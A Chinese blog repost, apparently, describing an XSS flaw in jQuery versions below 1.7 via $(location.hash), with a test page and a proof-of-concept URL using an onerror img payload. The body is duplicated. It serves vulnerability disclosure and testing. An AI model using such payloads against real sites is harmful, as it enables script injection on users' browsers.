jQuery跨站脚本漏洞XSS with $(location.hash)漏洞
2016-12-01 11:04
1331 查看
jquery下载地址:https://code.jquery.com/jquery/
影响范围:
版本低于1.7的jQuery过滤用户输入数据所使用的正则表达式存在缺陷,可能导致LOCATION.HASH跨站漏洞
已测试成功版本:
jquery-1.6.min.js,jquery-1.6.1.min.js,jquery-1.6.2.min.js
jquery-1.5所有版本
jquery-1.4所有版本
jquery-1.3所有版本
jquery-1.2所有版本
测试:
启动nginx,并建立index.html页面,内容如下:
漏洞发现者给的测试代码:
<html>
<head>
<title>JQuery-xss-test</title>
<script src="https://code.jquery.com/jquery-1.6.1.min.js"></script>
<script>
$(function(){
try { $(location.hash) } catch(e) {}
})
</script>
</head>
<body>
Jquery xss test.
</body>
</html>
访问地址: http://localhost/#<img src=/ onerror=alert(/F4ckTeam/)>
测试截图:
![](https://oscdn.geek-share.com/Uploads/Images/Content/202011/03/e0ece385732988030948d2976562f14b.jpg)
影响范围:
版本低于1.7的jQuery过滤用户输入数据所使用的正则表达式存在缺陷,可能导致LOCATION.HASH跨站漏洞
已测试成功版本:
jquery-1.6.min.js,jquery-1.6.1.min.js,jquery-1.6.2.min.js
jquery-1.5所有版本
jquery-1.4所有版本
jquery-1.3所有版本
jquery-1.2所有版本
测试:
启动nginx,并建立index.html页面,内容如下:
漏洞发现者给的测试代码:
<html>
<head>
<title>JQuery-xss-test</title>
<script src="https://code.jquery.com/jquery-1.6.1.min.js"></script>
<script>
$(function(){
try { $(location.hash) } catch(e) {}
})
</script>
</head>
<body>
Jquery xss test.
</body>
</html>
访问地址: http://localhost/#<img src=/ onerror=alert(/F4ckTeam/)>
测试截图:
![](https://oscdn.geek-share.com/Uploads/Images/Content/202011/03/e0ece385732988030948d2976562f14b.jpg)
相关文章推荐
- JQuery-1.7.2.min.js跨站脚本漏洞
- jQuery 跨站脚本漏洞
- JQuery 1.4.2 'index.html'跨站脚本漏洞
- Mozilla FireFox 爆JAR URI处理跨站脚本漏洞 可偷窃Google帐户
- 跨站脚本执行漏洞利用技巧两则
- 测试 Web 应用程序是否存在跨站点脚本漏洞
- 跨站脚本执行漏洞代码的几点思路
- Struts1.x 跨站脚本(XSS)漏洞的解决
- PHPWind论坛5.3版postupload.php附件文件名跨站脚本漏洞
- 跨站脚本执行漏洞详解与防护
- 9月第2周安全回顾:跨站脚本取代SQL注入 成Web漏洞王 推荐
- phpinfo跨站脚本漏洞
- 简单分析Script脚本跨站攻击漏洞技术
- LB论坛(所有版本)跨站脚本漏洞
- [原创]Yeepay网站安全测试漏洞之跨站脚本注入
- 小心XSS 跨站脚本漏洞已是web漏洞王
- window.open()的完整参数列表 与 跨站脚本执行漏洞
- 测试Web应用程序是否存在跨站点脚本漏洞
- [原创]支付宝alipay网站安全性测试漏洞之“跨站脚本注入攻击”
- 淘宝跨站脚本漏洞